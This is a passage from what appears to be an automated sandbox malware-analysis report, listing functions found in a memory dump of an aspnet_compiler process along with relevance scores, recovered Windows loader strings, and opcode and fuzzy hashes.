                                                                                                        • Instruction Fuzzy Hash: DD31B0322087469BE311DB28D858B1ABBE8FF84724F040869FD54CB394EB30DA05CB92
                                                                                                        Function 017B329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .Local\$@
                                                                                                        • API String ID: 0-380025441
                                                                                                        • Opcode ID: 74888afa0947b498eb85fcc558ef90f51eeff0dee3040ce6c9ac758354eb268d
                                                                                                        • Instruction ID: 3f308f9ec1fe2623448d17fadafd890421f62f8c5e182ddedc6ab58e056f684b
                                                                                                        • Opcode Fuzzy Hash: 74888afa0947b498eb85fcc558ef90f51eeff0dee3040ce6c9ac758354eb268d
                                                                                                        • Instruction Fuzzy Hash: A231ADB21097059FC321DF28C8C4AABFBE8FB85654F44092EF99583350DB30DD488B92
                                                                                                        Function 017B34B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        • RtlpInitializeAssemblyStorageMap, xrefs: 017F2A90
                                                                                                        • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 017F2A95
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                        • API String ID: 0-2653619699
                                                                                                        • Opcode ID: 5f663ed3b3ce84549a020b10f12ce48392e6ffaaad8c7aea00263363ae4c1cc2
                                                                                                        • Instruction ID: 54e021f9d7c96ee3a2e836d74049135484c4a756a019042dd50e4c422791c689
                                                                                                        • Opcode Fuzzy Hash: 5f663ed3b3ce84549a020b10f12ce48392e6ffaaad8c7aea00263363ae4c1cc2
                                                                                                        • Instruction Fuzzy Hash: DE112C75704215FBFB2A8A4C8D81FBBF6A9AB94B54F14806D7F04DB345D774CE448290
                                                                                                        Function 017BA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: Cleanup Group$Threadpool!
                                                                                                        • API String ID: 2994545307-4008356553
                                                                                                        • Opcode ID: 683500319175f583c6216c6bf54150a070538265f8a207a2785354a24188537a
                                                                                                        • Instruction ID: a74925e28701cbf94ea32a6e28eb07aea58ba4ec6b309f65326a83bf1a15012e
                                                                                                        • Opcode Fuzzy Hash: 683500319175f583c6216c6bf54150a070538265f8a207a2785354a24188537a
                                                                                                        • Instruction Fuzzy Hash: DB01D1B2240700AFE311EF14CD89B56BBF8EB94B19F018939A648C7190E774E904CB46
                                                                                                        Function 01787370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8d68c193d1b97dcdd712612b73dd1f6c9d5dcb161556deeb302b1f0285e40c28
                                                                                                        • Instruction ID: 01c5fccef9b165f42c15d5210480e8ef6f8701c0bbc23d7314b76f5aa2e4b574
                                                                                                        • Opcode Fuzzy Hash: 8d68c193d1b97dcdd712612b73dd1f6c9d5dcb161556deeb302b1f0285e40c28
                                                                                                        • Instruction Fuzzy Hash: 5CA18B71608342CFC725EF28D484A2AFBE5FF98714F24496EE58A87351E730E945CB92
                                                                                                        Function 0183B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PreferredUILanguages
                                                                                                        • API String ID: 0-1884656846
                                                                                                        • Opcode ID: 72b009bf8d0b3bd3452b58ef4821229adef94f966c633275841175ec625083f2
                                                                                                        • Instruction ID: 03a323042167dc88e6e2cf9d612b643af5efa3c639bc41dcf3fd854fcf233a19
                                                                                                        • Opcode Fuzzy Hash: 72b009bf8d0b3bd3452b58ef4821229adef94f966c633275841175ec625083f2
                                                                                                        • Instruction Fuzzy Hash: 864183B2900229ABDF11DA99C844BEEB7F9AFC4750F09416AEE11E7254D674DF40C7E0
                                                                                                        Function 0182705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: kLsE
                                                                                                        • API String ID: 0-3058123920
                                                                                                        • Opcode ID: b54cfa49210f59d6db26e101078615436f4381187b201c88eb4d1a5a262355cf
                                                                                                        • Instruction ID: 3dfe771116f82b0b6534c44405986d8d6bda432d52643d611ce8227d36766ba4
                                                                                                        • Opcode Fuzzy Hash: b54cfa49210f59d6db26e101078615436f4381187b201c88eb4d1a5a262355cf
                                                                                                        • Instruction Fuzzy Hash: CB415A31501B668BF732AB69D84CB657F90EB61B24F34011DED50CA0C9DB7487C5CBA1
                                                                                                        Function 017B7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: #
                                                                                                        • API String ID: 0-1885708031
                                                                                                        • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                        • Instruction ID: bd34adcc11de4964b64ada4b1ec44741d89a1d5243dc1f1ed71b5183e4b5d234
                                                                                                        • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                        • Instruction Fuzzy Hash: 51418C75A0065AEBCF299F58C490BFEF7B5EF84701F10405AE942AB381DB30D941CBA1
                                                                                                        Function 01785096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Actx
                                                                                                        • API String ID: 0-89312691
                                                                                                        • Opcode ID: 5b87307f6f784526501a49cf93af4ac87a0a2899ab2eb564ea19d9e3f8b518d0
                                                                                                        • Instruction ID: 860c3e8f90c4e28e1b7cf16656cb0eea7f3211ec40b628e8e7037494f8fa00a4
                                                                                                        • Opcode Fuzzy Hash: 5b87307f6f784526501a49cf93af4ac87a0a2899ab2eb564ea19d9e3f8b518d0
                                                                                                        • Instruction Fuzzy Hash: 541104307C82068BEB346D2C8854676FBD5EB85324F34817AE5A2CF391D671DC42C381
                                                                                                        Function 017D739A Relevance: .7, Instructions: 705COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 32811f8a807a5278dc6b0a5bc67939e87342d29107c441b714aa192dd7b35c07
                                                                                                        • Instruction ID: 293ef18582618402ad291175e65840f3e20816d849c4c9df55ca8ec4c5e629f1
                                                                                                        • Opcode Fuzzy Hash: 32811f8a807a5278dc6b0a5bc67939e87342d29107c441b714aa192dd7b35c07
                                                                                                        • Instruction Fuzzy Hash: F0429171A0061A8FDB19CF5DC490ABEFBB2FF88318B28855DD552AB351D734E942CB90
                                                                                                        Function 017AB2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b5ce0a7a72e7d04abc39606d27ad7db8c214ecf1e2e24d9c0405a784aac07ab9
                                                                                                        • Instruction ID: fef22928c6f48132135208d2409eeaf36d46ca20915426999f6b8b40bd0f43ee
                                                                                                        • Opcode Fuzzy Hash: b5ce0a7a72e7d04abc39606d27ad7db8c214ecf1e2e24d9c0405a784aac07ab9
                                                                                                        • Instruction Fuzzy Hash: 3B329D71E00219DBDB24CFA8D894BAEFBB1FF94714F58026DE905AB381E7359901CB91
                                                                                                        Function 0182A118 Relevance: .6, Instructions: 591COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ca8318dfe68670455d63f7c6d8cd8ac1fe56770936d4cf8fcb8a98846258eb9f
                                                                                                        • Instruction ID: 84ce5c5703fd613c82fbc5bf68d680e48e95c9daf867cda22f8a191f809d3a2f
                                                                                                        • Opcode Fuzzy Hash: ca8318dfe68670455d63f7c6d8cd8ac1fe56770936d4cf8fcb8a98846258eb9f
                                                                                                        • Instruction Fuzzy Hash: 8022C0742046758FEB2ACF2DC094372BBF1AF45304F18845AE986CBA86D735D6D2CB64
                                                                                                        Function 017865D0 Relevance: .4, Instructions: 383COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9cf83ecd6963dddf0c6415ae9715900e218e72a737ddf1bf000c098d3ae15e17
                                                                                                        • Instruction ID: 98b0b502d1d4e11b0871e4aadd00bf64780379f6000ce77a26db78bc011edeee
                                                                                                        • Opcode Fuzzy Hash: 9cf83ecd6963dddf0c6415ae9715900e218e72a737ddf1bf000c098d3ae15e17
                                                                                                        • Instruction Fuzzy Hash: 0CE18B71608342DFC715EF28C094A6AFBE0BF89314F15896DF9998B351EB31E905CB92
                                                                                                        Function 01778397 Relevance: .4, Instructions: 380COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b8bed7cc4f1ba13d6e42e97b0800c776ec7cad5d2408898c659da2ac5f1a16b7
                                                                                                        • Instruction ID: e2989a77803508224d183dacccdc6661ac583521b9f3de20a350d5243d6a2dbe
                                                                                                        • Opcode Fuzzy Hash: b8bed7cc4f1ba13d6e42e97b0800c776ec7cad5d2408898c659da2ac5f1a16b7
                                                                                                        • Instruction Fuzzy Hash: A1D10471A0020A9BDF14DF68C888ABEF7F5BF54304F15866DEA16DB280E734D950CB91
                                                                                                        Function 0179F460 Relevance: .3, Instructions: 321COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 98a54d309af4f5aea2cc9855cfb08e445129e634042005c2d6d52df2951fafcd
                                                                                                        • Instruction ID: b7a8b181dbd107d76a9df1550d94f87e8de25395529674d2a1f27d875b7d6953
                                                                                                        • Opcode Fuzzy Hash: 98a54d309af4f5aea2cc9855cfb08e445129e634042005c2d6d52df2951fafcd
                                                                                                        • Instruction Fuzzy Hash: 68C1E071A012158BDF25CF2CE494BB9FFB1EB44714F2941A9E942DB3A6E730D948CB90
                                                                                                        Function 01790535 Relevance: .3, Instructions: 300COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                        • Instruction ID: a46220c7d3f6c71b0b1b640ad7223fb3e6e684c3a87ad1bb6d3e4d367095a71b
                                                                                                        • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                        • Instruction Fuzzy Hash: 82B1F831610646AFDF25DB68C854BBEFBFAAF88300F284199E652D7285D730E945CB90
                                                                                                        Function 017A90DB Relevance: .3, Instructions: 287COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d31ab8137f891885aed2560aecc51da9ed187dee5ad52dd98c36c73d0c0f256d
                                                                                                        • Instruction ID: ed571c9c90e4256f8b6fc56ab7c03d8ea9ce167f0aa643dd1f0fd941902269bc
                                                                                                        • Opcode Fuzzy Hash: d31ab8137f891885aed2560aecc51da9ed187dee5ad52dd98c36c73d0c0f256d
                                                                                                        • Instruction Fuzzy Hash: 21A14E71500616AFEB229FA8CC49FAEBBB9EF49750F050158FA00AB290D775DD10CBA0
                                                                                                        Function 017883C0 Relevance: .3, Instructions: 281COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4dfcb512b927ffae3ae5b6bd7e0a63ecf5079ac31e7be618f1a4083fcedc25ed
                                                                                                        • Instruction ID: 5ed9977aa260b7e5eee1dc075e037ac21f6e7ccc71f2cedeffc4fb366faeed15
                                                                                                        • Opcode Fuzzy Hash: 4dfcb512b927ffae3ae5b6bd7e0a63ecf5079ac31e7be618f1a4083fcedc25ed
                                                                                                        • Instruction Fuzzy Hash: 53C16874108341CFE760DF18C495BAAF7E5BF88304F94496DE98987291E774E908CFA2
                                                                                                        Function 0177C427 Relevance: .3, Instructions: 280COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cf83e80c8567c06f164737c2f37b7a9e1f3bb9162e3eb77f17b94fbe06e4a990
                                                                                                        • Instruction ID: c1cf60489cb73b729ab5aa7e17ea82ef246d819572e212c5ac6449967f53749d
                                                                                                        • Opcode Fuzzy Hash: cf83e80c8567c06f164737c2f37b7a9e1f3bb9162e3eb77f17b94fbe06e4a990
                                                                                                        • Instruction Fuzzy Hash: 12B18270A0026A8BDB35CF68C880BA9F7B1EF48704F1485E9D50AE7245EB31DEC5CB20
                                                                                                        Function 017AE5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 12913ee360840f70190646bcfb2e84e333329f913d02953146bef186ab89552d
                                                                                                        • Instruction ID: 3951a782c6ba37349141abf79682774f73aa0bd5a372ba40102b9be73dc09d65
                                                                                                        • Opcode Fuzzy Hash: 12913ee360840f70190646bcfb2e84e333329f913d02953146bef186ab89552d
                                                                                                        • Instruction Fuzzy Hash: 11A10331E006199FEB22DB6CC84CBAEFBF4AB49714F150265EA01AB6D1DB749D40CB91
                                                                                                        Function 017C0185 Relevance: .3, Instructions: 276COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 011d1fa4059b7a350d67c8ed3efbe284c705855e2c22ec850cbd3963fe6b2890
                                                                                                        • Instruction ID: 50e4be0772b9b5b987021b306bf0f455c6aafd99ed57fc9d4ca7359bceabc2be
                                                                                                        • Opcode Fuzzy Hash: 011d1fa4059b7a350d67c8ed3efbe284c705855e2c22ec850cbd3963fe6b2890
                                                                                                        • Instruction Fuzzy Hash: 7DA1AB74A00616DBEB25DF69C894BABF7A5FF54B18F10402DFB0597282EB34E911CB90
                                                                                                        Function 01854500 Relevance: .3, Instructions: 275COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d5d9793ee8b3e4bc5cf1a0b751d85c6aeddb0955341b8cd0875fe606843fe1a0
                                                                                                        • Instruction ID: 0fdc11fb93f81a66de2d71ed1c1f7f1c1b0c46156166e04995cbecf3920a7d6d
                                                                                                        • Opcode Fuzzy Hash: d5d9793ee8b3e4bc5cf1a0b751d85c6aeddb0955341b8cd0875fe606843fe1a0
                                                                                                        • Instruction Fuzzy Hash: B9A1FE72A04602AFDB11DF28C984B5ABBE9FF48704F54092CF949DB651E330EE84CB91
                                                                                                        Function 0179E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d52ad973af6cd1681a90843ee3ccabc0110b5b231721cdf5d32915bffe2d2af8
                                                                                                        • Instruction ID: 5b5a5df2a936241fcaf99db574e7a780600baa1f537aee39bb9669159c4bece3
                                                                                                        • Opcode Fuzzy Hash: d52ad973af6cd1681a90843ee3ccabc0110b5b231721cdf5d32915bffe2d2af8
                                                                                                        • Instruction Fuzzy Hash: 76914732A00616DBEF24DB18E888BBDFBE1EF98714F2440A5EA05DB351FA34D909C751
                                                                                                        Function 01781131 Relevance: .3, Instructions: 259COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2c21d983ba20e17a7b6700fdaf67f62bd12e1db8173703849031d99f7c6b5915
                                                                                                        • Instruction ID: 824de293e3279b8d3481918166104bee4ec5d64550fa4a6824a63d8f82bc5ad3
                                                                                                        • Opcode Fuzzy Hash: 2c21d983ba20e17a7b6700fdaf67f62bd12e1db8173703849031d99f7c6b5915
                                                                                                        • Instruction Fuzzy Hash: 9CB112B5A093418FD354CF28C480A5AFBF1BB88304F584A6EF99AD7352D331E946CB42
                                                                                                        Function 01789486 Relevance: .3, Instructions: 259COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ef77f52e57248e0a38e2ba9aa8dce83b476d6933dc46b5c7b00025dfa0fff694
                                                                                                        • Instruction ID: 6c62033791bbaad2ecdb5e703d41a69a388dc66d2d734d69df004b4703fe4028
                                                                                                        • Opcode Fuzzy Hash: ef77f52e57248e0a38e2ba9aa8dce83b476d6933dc46b5c7b00025dfa0fff694
                                                                                                        • Instruction Fuzzy Hash: 78B14A74A80205CFDB25EF1CD4886B9FBF0BB8831CF244599DA259B296D731D942CFA0
                                                                                                        Function 0183B52F Relevance: .2, Instructions: 222COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                        • Instruction ID: d2ef10c622fe2b1a39e1822ff5dc8e3f9f4455433ec1a8e81c774abb4d0ddea5
                                                                                                        • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                                                                        • Instruction Fuzzy Hash: 5A719FB5A0121A9BDF21CF68C481ABEBBF5EF84750F5D411AE901EB242E734DB418BD0
                                                                                                        Function 017AD090 Relevance: .2, Instructions: 217COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                        • Instruction ID: 8542b77564c7ca26022f53af71af2fd3760a3ab8fc359ff17e7c6aeeca93ff75
                                                                                                        • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                                                                        • Instruction Fuzzy Hash: 95818372E001168BDF25CF9CC9887ADFBF2FB88314F194A6AD915B7344DA31A940CB91
                                                                                                        Function 017BE284 Relevance: .2, Instructions: 212COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a0899eb836fa0015d56f59656744e90ba74d15ed9e0d10d8d85ac270cdaef1d1
                                                                                                        • Instruction ID: 5862869123cbc542c771fe8c9db483da5ede2ffd9d25adcea1b0edc7e783970c
                                                                                                        • Opcode Fuzzy Hash: a0899eb836fa0015d56f59656744e90ba74d15ed9e0d10d8d85ac270cdaef1d1
                                                                                                        • Instruction Fuzzy Hash: 7E811B71A01609AFDB25CBA9C880BEEFBBAFF48354F14442DE655A7350DB30AD45CB60
                                                                                                        Function 0180035C Relevance: .2, Instructions: 198COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                        • Instruction ID: 9fccc8c66f3c0519b5aab3840d7dd312e0fe49e989056b588eb5cfc8335e508e
                                                                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                        • Instruction Fuzzy Hash: C2717C71A00619EFDB11DFA9C984BAEBBB8FF48744F104569E505E7290DB30EA45CB90
                                                                                                        Function 018162A0 Relevance: .2, Instructions: 198COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_1750000_aspnet_compiler.jbxd
